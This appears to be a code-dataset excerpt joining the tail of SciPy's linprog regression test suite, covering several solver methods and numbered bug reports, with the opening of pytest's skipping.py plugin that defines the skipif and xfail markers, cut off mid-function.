[0, -1, -1, 2.1, 0, 0, 0, f, f, -1, 0, 0, 0, 0, 0, 0, 0, g, 0],
[0, 0, 0, 0, -1, -1, 2, 0, 0, 0, f, f, -1, 0, 0, 0, 0, 0, g]])
b_ub = np.array([
0.0, 0, 0, 100, 100, 100, 100, 100, 100, 900, 900, 900, 900, 900,
900, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
c = np.array([-1.0, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 0, 0, 0, 0, 0, 0])
with suppress_warnings() as sup:
sup.filter(OptimizeWarning,
"Solving system with option 'sym_pos'")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-106.63507541835018)
def test_bug_6139(self):
# linprog(method='simplex') fails to find a basic feasible solution
# if phase 1 pseudo-objective function is outside the provided tol.
# https://github.com/scipy/scipy/issues/6139
# Note: This is not strictly a bug as the default tolerance determines
# if a result is "close enough" to zero and should not be expected
# to work for all cases.
c = np.array([1, 1, 1])
A_eq = np.array([[1., 0., 0.], [-1000., 0., - 1000.]])
b_eq = np.array([5.00000000e+00, -1.00000000e+04])
A_ub = -np.array([[0., 1000000., 1010000.]])
b_ub = -np.array([10000000.])
bounds = (None, None)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=14.95,
desired_x=np.array([5, 4.95, 5]))
def test_bug_6690(self):
# linprog simplex used to violate bound constraint despite reporting
# success.
# https://github.com/scipy/scipy/issues/6690
A_eq = np.array([[0, 0, 0, 0.93, 0, 0.65, 0, 0, 0.83, 0]])
b_eq = np.array([0.9626])
A_ub = np.array([
[0, 0, 0, 1.18, 0, 0, 0, -0.2, 0, -0.22],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0.43, 0, 0, 0, 0, 0, 0],
[0, -1.22, -0.25, 0, 0, 0, -2.06, 0, 0, 1.37],
[0, 0, 0, 0, 0, 0, 0, -0.25, 0, 0]
])
b_ub = np.array([0.615, 0, 0.172, -0.869, -0.022])
bounds = np.array([
[-0.84, -0.97, 0.34, 0.4, -0.33, -0.74, 0.47, 0.09, -1.45, -0.73],
[0.37, 0.02, 2.86, 0.86, 1.18, 0.5, 1.76, 0.17, 0.32, -0.15]
]).T
c = np.array([
-1.64, 0.7, 1.8, -1.06, -1.16, 0.26, 2.13, 1.53, 0.66, 0.28
])
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(OptimizeWarning,
"Solving system with option 'cholesky'")
sup.filter(OptimizeWarning, "Solving system with option 'sym_pos'")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
desired_fun = -1.19099999999
desired_x = np.array([0.3700, -0.9700, 0.3400, 0.4000, 1.1800,
0.5000, 0.4700, 0.0900, 0.3200, -0.7300])
_assert_success(res, desired_fun=desired_fun, desired_x=desired_x)
# Add small tol value to ensure arrays are less than or equal.
atol = 1e-6
assert_array_less(bounds[:, 0] - atol, res.x)
assert_array_less(res.x, bounds[:, 1] + atol)
def test_bug_7044(self):
# linprog simplex failed to "identify correct constraints" (?)
# leading to a non-optimal solution if A is rank-deficient.
# https://github.com/scipy/scipy/issues/7044
A_eq, b_eq, c, N = magic_square(3)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
desired_fun = 1.730550597
_assert_success(res, desired_fun=desired_fun)
assert_allclose(A_eq.dot(res.x), b_eq)
assert_array_less(np.zeros(res.x.size) - 1e-5, res.x)
def test_bug_7237(self):
# https://github.com/scipy/scipy/issues/7237
# linprog simplex "explodes" when the pivot value is very
# close to zero.
c = np.array([-1, 0, 0, 0, 0, 0, 0, 0, 0])
A_ub = np.array([
[1., -724., 911., -551., -555., -896., 478., -80., -293.],
[1., 566., 42., 937., 233., 883., 392., -909., 57.],
[1., -208., -894., 539., 321., 532., -924., 942., 55.],
[1., 857., -859., 83., 462., -265., -971., 826., 482.],
[1., 314., -424., 245., -424., 194., -443., -104., -429.],
[1., 540., 679., 361., 149., -827., 876., 633., 302.],
[0., -1., -0., -0., -0., -0., -0., -0., -0.],
[0., -0., -1., -0., -0., -0., -0., -0., -0.],
[0., -0., -0., -1., -0., -0., -0., -0., -0.],
[0., -0., -0., -0., -1., -0., -0., -0., -0.],
[0., -0., -0., -0., -0., -1., -0., -0., -0.],
[0., -0., -0., -0., -0., -0., -1., -0., -0.],
[0., -0., -0., -0., -0., -0., -0., -1., -0.],
[0., -0., -0., -0., -0., -0., -0., -0., -1.],
[0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 1.]
])
b_ub = np.array([
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1.])
A_eq = np.array([[0., 1., 1., 1., 1., 1., 1., 1., 1.]])
b_eq = np.array([[1.]])
bounds = [(None, None)] * 9
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=108.568535, atol=1e-6)
def test_bug_8174(self):
# https://github.com/scipy/scipy/issues/8174
# The simplex method sometimes "explodes" if the pivot value is very
# close to zero.
A_ub = np.array([
[22714, 1008, 13380, -2713.5, -1116],
[-4986, -1092, -31220, 17386.5, 684],
[-4986, 0, 0, -2713.5, 0],
[22714, 0, 0, 17386.5, 0]])
b_ub = np.zeros(A_ub.shape[0])
c = -np.ones(A_ub.shape[1])
bounds = [(0, 1)] * A_ub.shape[1]
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
if self.options.get('tol', 1e-9) < 1e-10 and self.method == 'simplex':
_assert_unable_to_find_basic_feasible_sol(res)
else:
_assert_success(res, desired_fun=-2.0080717488789235, atol=1e-6)
def test_bug_8174_2(self):
# Test supplementary example from issue 8174.
# https://github.com/scipy/scipy/issues/8174
# https://stackoverflow.com/questions/47717012/linprog-in-scipy-optimize-checking-solution
c = np.array([1, 0, 0, 0, 0, 0, 0])
A_ub = -np.identity(7)
b_ub = np.array([[-2], [-2], [-2], [-2], [-2], [-2], [-2]])
A_eq = np.array([
[1, 1, 1, 1, 1, 1, 0],
[0.3, 1.3, 0.9, 0, 0, 0, -1],
[0.3, 0, 0, 0, 0, 0, -2/3],
[0, 0.65, 0, 0, 0, 0, -1/15],
[0, 0, 0.3, 0, 0, 0, -1/15]
])
b_eq = np.array([[100], [0], [0], [0], [0]])
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(OptimizeWarning, "A_eq does not appear...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=43.3333333331385)
def test_bug_8561(self):
# Test that pivot row is chosen correctly when using Bland's rule
# This was originally written for the simplex method with
# Bland's rule only, but it doesn't hurt to test all methods/options
# https://github.com/scipy/scipy/issues/8561
c = np.array([7, 0, -4, 1.5, 1.5])
A_ub = np.array([
[4, 5.5, 1.5, 1.0, -3.5],
[1, -2.5, -2, 2.5, 0.5],
[3, -0.5, 4, -12.5, -7],
[-1, 4.5, 2, -3.5, -2],
[5.5, 2, -4.5, -1, 9.5]])
b_ub = np.array([0, 0, 0, 0, 1])
res = linprog(c, A_ub=A_ub, b_ub=b_ub, options=self.options,
method=self.method)
_assert_success(res, desired_x=[0, 0, 19, 16/3, 29/3])
def test_bug_8662(self):
# linprog simplex used to report incorrect optimal results
# https://github.com/scipy/scipy/issues/8662
c = [-10, 10, 6, 3]
A_ub = [[8, -8, -4, 6],
[-8, 8, 4, -6],
[-4, 4, 8, -4],
[3, -3, -3, -10]]
b_ub = [9, -9, -9, -4]
bounds = [(0, None), (0, None), (0, None), (0, None)]
desired_fun = 36.0000000000
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res1 = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
# Set boundary condition as a constraint
A_ub.append([0, 0, -1, 0])
b_ub.append(0)
bounds[2] = (None, None)
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res2 = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
rtol = 1e-5
_assert_success(res1, desired_fun=desired_fun, rtol=rtol)
_assert_success(res2, desired_fun=desired_fun, rtol=rtol)
def test_bug_8663(self):
# exposed a bug in presolve
# https://github.com/scipy/scipy/issues/8663
c = [1, 5]
A_eq = [[0, -7]]
b_eq = [-6]
bounds = [(0, None), (None, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[0, 6./7], desired_fun=5*6./7)
def test_bug_8664(self):
# interior-point has trouble with this when presolve is off
# tested for interior-point with presolve off in TestLinprogIPSpecific
# https://github.com/scipy/scipy/issues/8664
c = [4]
A_ub = [[2], [5]]
b_ub = [4, 4]
A_eq = [[0], [-8], [9]]
b_eq = [3, 2, 10]
with suppress_warnings() as sup:
sup.filter(RuntimeWarning)
sup.filter(OptimizeWarning, "Solving system with option...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
def test_bug_8973(self):
"""
Test whether bug described at:
https://github.com/scipy/scipy/issues/8973
was fixed.
"""
c = np.array([0, 0, 0, 1, -1])
A_ub = np.array([[1, 0, 0, 0, 0], [0, 1, 0, 0, 0]])
b_ub = np.array([2, -2])
bounds = [(None, None), (None, None), (None, None), (-1, 1), (-1, 1)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[2, -2, 0, -1, 1], desired_fun=-2)
def test_bug_8973_2(self):
"""
Additional test for:
https://github.com/scipy/scipy/issues/8973
suggested in
https://github.com/scipy/scipy/pull/8985
review by @antonior92
"""
c = np.zeros(1)
A_ub = np.array([[1]])
b_ub = np.array([-2])
bounds = (None, None)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[-2], desired_fun=0)
def test_bug_10124(self):
"""
Test for linprog docstring problem
'disp'=True caused revised simplex failure
"""
c = np.zeros(1)
A_ub = np.array([[1]])
b_ub = np.array([-2])
bounds = (None, None)
c = [-1, 4]
A_ub = [[-3, 1], [1, 2]]
b_ub = [6, 4]
bounds = [(None, None), (-3, None)]
o = {"disp": True}
o.update(self.options)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_success(res, desired_x=[10, -3], desired_fun=-22)
def test_bug_10349(self):
"""
Test for redundancy removal tolerance issue
https://github.com/scipy/scipy/issues/10349
"""
A_eq = np.array([[1, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1],
[1, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 0],
[0, 1, 0, 0, 0, 1]])
b_eq = np.array([221, 210, 10, 141, 198, 102])
c = np.concatenate((0, 1, np.zeros(4)), axis=None)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[129, 92, 12, 198, 0, 10], desired_fun=92)
def test_bug_10466(self):
"""
Test that autoscale fixes poorly-scaled problem
"""
c = [-8., -0., -8., -0., -8., -0., -0., -0., -0., -0., -0., -0., -0.]
A_eq = [[1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 1., 0., 0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 1., 0., -1., 0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 1., 0., 0., 1., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0.],
[1., 0., 1., 0., 1., 0., 0., 0., 0., 0., 1., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0., 0., 0., 0., 1., 0.],
[0., 0., 1., 0., 1., 0., 0., 0., 0., 0., 0., 0., 1.]]
b_eq = [3.14572800e+08, 4.19430400e+08, 5.24288000e+08,
1.00663296e+09, 1.07374182e+09, 1.07374182e+09,
1.07374182e+09, 1.07374182e+09, 1.07374182e+09,
1.07374182e+09]
o = {"autoscale": True}
o.update(self.options)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "Solving system with option...")
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(RuntimeWarning, "scipy.linalg.solve\nIll...")
sup.filter(RuntimeWarning, "divide by zero encountered...")
sup.filter(RuntimeWarning, "overflow encountered...")
sup.filter(RuntimeWarning, "invalid value encountered...")
sup.filter(LinAlgWarning, "Ill-conditioned matrix...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
assert_allclose(res.fun, -8589934560)
#########################
# Method-specific Tests #
#########################
class LinprogSimplexTests(LinprogCommonTests):
method = "simplex"
class LinprogIPTests(LinprogCommonTests):
method = "interior-point"
class LinprogRSTests(LinprogCommonTests):
method = "revised simplex"
# Revised simplex does not reliably solve these problems.
# Failure is intermittent due to the random choice of elements to complete
    # the basis after phase 1 terminates. In any case, linprog exits
# gracefully, reporting numerical difficulties. I do not think this should
# prevent revised simplex from being merged, as it solves the problems
# most of the time and solves a broader range of problems than the existing
# simplex implementation.
# I believe that the root cause is the same for all three and that this
# same issue prevents revised simplex from solving many other problems
# reliably. Somehow the pivoting rule allows the algorithm to pivot into
# a singular basis. I haven't been able to find a reference that
# acknowledges this possibility, suggesting that there is a bug. On the
# other hand, the pivoting rule is quite simple, and I can't find a
# mistake, which suggests that this is a possibility with the pivoting
# rule. Hopefully a better pivoting rule will fix the issue.
def test_bug_5400(self):
pytest.skip("Intermittent failure acceptable.")
def test_bug_8662(self):
pytest.skip("Intermittent failure acceptable.")
def test_network_flow(self):
pytest.skip("Intermittent failure acceptable.")
################################
# Simplex Option-Specific Tests#
################################
class TestLinprogSimplexDefault(LinprogSimplexTests):
def setup_method(self):
self.options = {}
def test_bug_5400(self):
with pytest.raises(ValueError):
super(TestLinprogSimplexDefault, self).test_bug_5400()
def test_bug_7237_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
        # even if the solution is wrong, the appropriate error is raised.
self.options.update({'tol': 1e-12})
with pytest.raises(ValueError):
super(TestLinprogSimplexDefault, self).test_bug_7237()
def test_bug_8174_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
        # even if the solution is wrong, the appropriate warning is issued.
self.options.update({'tol': 1e-12})
with pytest.warns(OptimizeWarning):
super(TestLinprogSimplexDefault, self).test_bug_8174()
class TestLinprogSimplexBland(LinprogSimplexTests):
def setup_method(self):
self.options = {'bland': True}
def test_bug_5400(self):
with pytest.raises(ValueError):
super(TestLinprogSimplexBland, self).test_bug_5400()
def test_bug_8174_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
        # even if the solution is wrong, the appropriate error is raised.
self.options.update({'tol': 1e-12})
with pytest.raises(AssertionError):
with pytest.warns(OptimizeWarning):
super(TestLinprogSimplexBland, self).test_bug_8174()
class TestLinprogSimplexNoPresolve(LinprogSimplexTests):
def setup_method(self):
self.options = {'presolve': False}
is_32_bit = np.intp(0).itemsize < 8
is_linux = sys.platform.startswith('linux')
@pytest.mark.xfail(
condition=is_32_bit and is_linux,
reason='Fails with warning on 32-bit linux')
def test_bug_5400(self):
super(TestLinprogSimplexNoPresolve, self).test_bug_5400()
def test_bug_6139_low_tol(self):
# Linprog(method='simplex') fails to find a basic feasible solution
# if phase 1 pseudo-objective function is outside the provided tol.
# https://github.com/scipy/scipy/issues/6139
# Without ``presolve`` eliminating such rows the result is incorrect.
self.options.update({'tol': 1e-12})
with pytest.raises(ValueError):
return super(TestLinprogSimplexNoPresolve, self).test_bug_6139()
def test_bug_7237_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
        # even if the solution is wrong, the appropriate error is raised.
self.options.update({'tol': 1e-12})
with pytest.raises(ValueError):
super(TestLinprogSimplexNoPresolve, self).test_bug_7237()
def test_bug_8174_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
        # even if the solution is wrong, the appropriate warning is issued.
self.options.update({'tol': 1e-12})
with pytest.warns(OptimizeWarning):
super(TestLinprogSimplexNoPresolve, self).test_bug_8174()
def test_unbounded_no_nontrivial_constraints_1(self):
pytest.skip("Tests behavior specific to presolve")
def test_unbounded_no_nontrivial_constraints_2(self):
pytest.skip("Tests behavior specific to presolve")
#######################################
# Interior-Point Option-Specific Tests#
#######################################
class TestLinprogIPDense(LinprogIPTests):
options = {"sparse": False}
if has_cholmod:
class TestLinprogIPSparseCholmod(LinprogIPTests):
options = {"sparse": True, "cholesky": True}
if has_umfpack:
class TestLinprogIPSparseUmfpack(LinprogIPTests):
options = {"sparse": True, "cholesky": False}
def test_bug_10466(self):
pytest.skip("Autoscale doesn't fix everything, and that's OK.")
class TestLinprogIPSparse(LinprogIPTests):
options = {"sparse": True, "cholesky": False, "sym_pos": False}
@pytest.mark.xfail(reason='Fails with ATLAS, see gh-7877')
def test_bug_6690(self):
# Test defined in base class, but can't mark as xfail there
super(TestLinprogIPSparse, self).test_bug_6690()
def test_magic_square_sparse_no_presolve(self):
# test linprog with a problem with a rank-deficient A_eq matrix
A_eq, b_eq, c, N = magic_square(3)
bounds = (0, 1)
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(MatrixRankWarning, "Matrix is exactly singular")
sup.filter(OptimizeWarning, "Solving system with option...")
o = {key: self.options[key] for key in self.options}
o["presolve"] = False
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_success(res, desired_fun=1.730550597)
def test_sparse_solve_options(self):
# checking that problem is solved with all column permutation options
A_eq, b_eq, c, N = magic_square(3)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
sup.filter(OptimizeWarning, "Invalid permc_spec option")
o = {key: self.options[key] for key in self.options}
permc_specs = ('NATURAL', 'MMD_ATA', 'MMD_AT_PLUS_A',
'COLAMD', 'ekki-ekki-ekki')
# 'ekki-ekki-ekki' raises warning about invalid permc_spec option
# and uses default
for permc_spec in permc_specs:
o["permc_spec"] = permc_spec
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_success(res, desired_fun=1.730550597)
class TestLinprogIPSparsePresolve(LinprogIPTests):
options = {"sparse": True, "_sparse_presolve": True}
def test_enzo_example_c_with_infeasibility(self):
pytest.skip('_sparse_presolve=True incompatible with presolve=False')
@pytest.mark.xfail(reason='Fails with ATLAS, see gh-7877')
def test_bug_6690(self):
# Test defined in base class, but can't mark as xfail there
super(TestLinprogIPSparsePresolve, self).test_bug_6690()
class TestLinprogIPSpecific(object):
method = "interior-point"
# the following tests don't need to be performed separately for
# sparse presolve, sparse after presolve, and dense
def test_solver_select(self):
# check that default solver is selected as expected
if has_cholmod:
options = {'sparse': True, 'cholesky': True}
elif has_umfpack:
options = {'sparse': True, 'cholesky': False}
else:
options = {'sparse': True, 'cholesky': False, 'sym_pos': False}
A, b, c = lpgen_2d(20, 20)
res1 = linprog(c, A_ub=A, b_ub=b, method=self.method, options=options)
res2 = linprog(c, A_ub=A, b_ub=b, method=self.method) # default solver
assert_allclose(res1.fun, res2.fun,
err_msg="linprog default solver unexpected result",
rtol=1e-15, atol=1e-15)
def test_unbounded_below_no_presolve_original(self):
# formerly caused segfault in TravisCI w/ "cholesky":True
c = [-1]
bounds = [(None, 1)]
res = linprog(c=c, bounds=bounds,
method=self.method,
options={"presolve": False, "cholesky": True})
_assert_success(res, desired_fun=-1)
def test_cholesky(self):
# use cholesky factorization and triangular solves
A, b, c = lpgen_2d(20, 20)
res = linprog(c, A_ub=A, b_ub=b, method=self.method,
options={"cholesky": True}) # only for dense
_assert_success(res, desired_fun=-64.049494229)
def test_alternate_initial_point(self):
# use "improved" initial point
A, b, c = lpgen_2d(20, 20)
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "scipy.linalg.solve\nIll...")
sup.filter(OptimizeWarning, "Solving system with option...")
sup.filter(LinAlgWarning, "Ill-conditioned matrix...")
res = linprog(c, A_ub=A, b_ub=b, method=self.method,
options={"ip": True, "disp": True})
# ip code is independent of sparse/dense
_assert_success(res, desired_fun=-64.049494229)
def test_maxiter(self):
# test iteration limit
A, b, c = lpgen_2d(20, 20)
maxiter = np.random.randint(6) + 1 # problem takes 7 iterations
res = linprog(c, A_ub=A, b_ub=b, method=self.method,
options={"maxiter": maxiter})
# maxiter is independent of sparse/dense
_assert_iteration_limit_reached(res, maxiter)
assert_equal(res.nit, maxiter)
def test_bug_8664(self):
# interior-point has trouble with this when presolve is off
c = [4]
A_ub = [[2], [5]]
b_ub = [4, 4]
A_eq = [[0], [-8], [9]]
b_eq = [3, 2, 10]
with suppress_warnings() as sup:
sup.filter(RuntimeWarning)
sup.filter(OptimizeWarning, "Solving system with option...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options={"presolve": False})
assert_(not res.success, "Incorrectly reported success")
########################################
# Revised Simplex Option-Specific Tests#
########################################
class TestLinprogRSCommon(LinprogRSTests):
options = {}
def test_cyclic_bland(self):
pytest.skip("Intermittent failure acceptable.")
def test_nontrivial_problem_with_guess(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_unbounded_variables(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
bounds = [(None, None), (None, None), (0, None), (None, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_bounded_variables(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
bounds = [(None, 1), (1, None), (0, None), (.4, .6)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_negative_unbounded_variable(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
b_eq = [4]
x_star = np.array([-219/385, 582/385, 0, 4/10])
f_star = 3951/385
bounds = [(None, None), (1, None), (0, None), (.4, .6)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_bad_guess(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
bad_guess = [1, 2, 3, .5]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=bad_guess)
assert_equal(res.status, 6)
def test_redundant_constraints_with_guess(self):
A, b, c, N = magic_square(3)
p = np.random.rand(*c.shape)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_eq=A, b_eq=b, method=self.method)
res2 = linprog(c, A_eq=A, b_eq=b, method=self.method, x0=res.x)
res3 = linprog(c + p, A_eq=A, b_eq=b, method=self.method, x0=res.x)
_assert_success(res2, desired_fun=1.730550597)
assert_equal(res2.nit, 0)
_assert_success(res3)
assert_(res3.nit < res.nit) # hot start reduces iterations
class TestLinprogRSBland(LinprogRSTests):
options = {"pivot": "bland"}
###########################
# Autoscale-Specific Tests#
###########################
class AutoscaleTests(object):
options = {"autoscale": True}
test_bug_6139 = LinprogCommonTests.test_bug_6139
test_bug_6690 = LinprogCommonTests.test_bug_6690
test_bug_7237 = LinprogCommonTests.test_bug_7237
class TestAutoscaleIP(AutoscaleTests):
method = "interior-point"
def test_bug_6139(self):
self.options['tol'] = 1e-10
return AutoscaleTests.test_bug_6139(self)
class TestAutoscaleSimplex(AutoscaleTests):
method = "simplex"
class TestAutoscaleRS(AutoscaleTests):
method = "revised simplex"
def test_nontrivial_problem_with_guess(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_bad_guess(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
bad_guess = [1, 2, 3, .5]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=bad_guess)
assert_equal(res.status, 6)
| bsd-3-clause | 3,454,162,632,432,896,000 | 38.471388 | 98 | 0.517706 | false |
Syrcon/servo | tests/wpt/web-platform-tests/tools/pytest/_pytest/skipping.py | 168 | 12742 | """ support for skip/xfail functions and markers. """
import os
import sys
import traceback
import py
import pytest
from _pytest.mark import MarkInfo, MarkDecorator
def pytest_addoption(parser):
group = parser.getgroup("general")
group.addoption('--runxfail',
action="store_true", dest="runxfail", default=False,
help="run tests even if they are marked xfail")
parser.addini("xfail_strict", "default for the strict parameter of xfail "
"markers when not given explicitly (default: "
"False)",
default=False,
type="bool")
def pytest_configure(config):
if config.option.runxfail:
old = pytest.xfail
config._cleanup.append(lambda: setattr(pytest, "xfail", old))
def nop(*args, **kwargs):
pass
nop.Exception = XFailed
setattr(pytest, "xfail", nop)
config.addinivalue_line("markers",
"skipif(condition): skip the given test function if eval(condition) "
"results in a True value. Evaluation happens within the "
"module global context. Example: skipif('sys.platform == \"win32\"') "
"skips the test if we are on the win32 platform. see "
"http://pytest.org/latest/skipping.html"
)
config.addinivalue_line("markers",
"xfail(condition, reason=None, run=True, raises=None): mark the the test function "
"as an expected failure if eval(condition) has a True value. "
"Optionally specify a reason for better reporting and run=False if "
"you don't even want to execute the test function. If only specific "
"exception(s) are expected, you can list them in raises, and if the test fails "
"in other ways, it will be reported as a true failure. "
"See http://pytest.org/latest/skipping.html"
)
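# Editor's sketch (not part of the original plugin): the marker help registered
# above corresponds to usage such as
#
#     @pytest.mark.skipif('sys.platform == "win32"')
#     def test_posix_only():
#         ...
#
#     @pytest.mark.xfail(raises=ZeroDivisionError, reason="known corner case")
#     def test_known_bug():
#         ...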
def pytest_namespace():
return dict(xfail=xfail)
class XFailed(pytest.fail.Exception):
""" raised from an explicit call to pytest.xfail() """
def xfail(reason=""):
""" xfail an executing test or setup functions with the given reason."""
__tracebackhide__ = True
raise XFailed(reason)
xfail.Exception = XFailed
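# Editor's sketch (not part of the original plugin): pytest.xfail() can also be
# called imperatively inside a test; `backend_available` below is a made-up name
# used only for illustration:
#
#     def test_feature():
#         if not backend_available:
#             pytest.xfail("optional backend not built")
#         ...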
class MarkEvaluator:
def __init__(self, item, name):
self.item = item
self.name = name
@property
def holder(self):
return self.item.keywords.get(self.name)
def __bool__(self):
return bool(self.holder)
__nonzero__ = __bool__
def wasvalid(self):
return not hasattr(self, 'exc')
def invalidraise(self, exc):
raises = self.get('raises')
if not raises:
return
return not isinstance(exc, raises)
def istrue(self):
try:
return self._istrue()
except Exception:
self.exc = sys.exc_info()
if isinstance(self.exc[1], SyntaxError):
msg = [" " * (self.exc[1].offset + 4) + "^",]
msg.append("SyntaxError: invalid syntax")
else:
msg = traceback.format_exception_only(*self.exc[:2])
pytest.fail("Error evaluating %r expression\n"
" %s\n"
"%s"
%(self.name, self.expr, "\n".join(msg)),
pytrace=False)
def _getglobals(self):
d = {'os': os, 'sys': sys, 'config': self.item.config}
func = self.item.obj
try:
d.update(func.__globals__)
except AttributeError:
d.update(func.func_globals)
return d
def _istrue(self):
if hasattr(self, 'result'):
return self.result
if self.holder:
d = self._getglobals()
if self.holder.args:
self.result = False
# "holder" might be a MarkInfo or a MarkDecorator; only
# MarkInfo keeps track of all parameters it received in an
# _arglist attribute
if hasattr(self.holder, '_arglist'):
arglist = self.holder._arglist
else:
arglist = [(self.holder.args, self.holder.kwargs)]
for args, kwargs in arglist:
for expr in args:
self.expr = expr
